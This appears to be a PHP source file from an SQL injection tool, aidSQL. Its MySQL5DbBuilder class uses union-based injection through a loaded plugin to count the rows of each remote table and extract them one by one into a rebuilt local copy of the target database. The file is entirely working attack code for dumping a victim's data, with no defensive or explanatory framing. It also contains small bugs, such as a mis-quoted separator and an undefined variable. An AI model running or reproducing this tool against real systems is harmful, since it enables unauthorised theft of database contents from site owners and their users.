<?php

	namespace aidSQL\db {

		class MySQL5DbBuilder extends AbstractDbBuilder{

			public function reverse(){

				$plugin	=	$this->_pLoader->getPluginInstance("sqli","mysql5",$this->_httpAdapter,$this->_logger);

				if(!$plugin->injectionUnionWithConcat()){

					throw (new \Exception("Could not make database, perhaps the sql injection vulnerability was solved?"));

				}

				foreach($this->_schemas as $schemaName=>$schemaTables){

					$this->createDatabase($schemaName);

					foreach($schemaTables as $schemaTableName=>$schemaTableValues){

						$this->createTable($schemaTableName,$schemaTableValues);

						$attributes			=	$schemaTableValues["attributes"];
						$columns				=	array_keys($schemaTableValues["columns"]);
						$colInsert			=	$columns;
						
						foreach($columns as &$col){

							$col="COALESCE($col,0)";

						}

						$from					=	$schemaName.'.'.$schemaTableName;
						$count				=	$plugin->count('*',$from);
						$count				=	$count[0];

						$this->log("FOUND $count registers in table $schemaTableName",0,"light_cyan");

						if($count==0){

							$this->log("WELL, NOTHING IN THIS TABLE BUD :/",0,"light_purple");
							continue;

						}

						$fieldSeparator	=	ord('\a');
						$select				=	implode(",$fieldSeparator,",$columns);

						$parameters	=	$plugin->getInjectionParameters();

						for($i=0;$i<$count;$i++){

							$parameters["limit"]	=	array($i,1);

							$plugin->setInjectionParameters($parameters);

							$values				=	$plugin->unionQuery($select,$from,array(),array());
							$values				=	$values[0];
							$values				=	explode(ord('\a'),$values);

							if(!$this->insertRegisters($schemaTableName,$colInsert,$values)){
								throw(new \Exception("Couldnt insert registers on $schemaTableName table!".$sqli->errno.':'.$sqli->error));
							}

						}

						$parameters["limit"]	=	array();
						$plugin->setInjectionParameters($parameters);

					}

				}

			}

		}

	}

?>
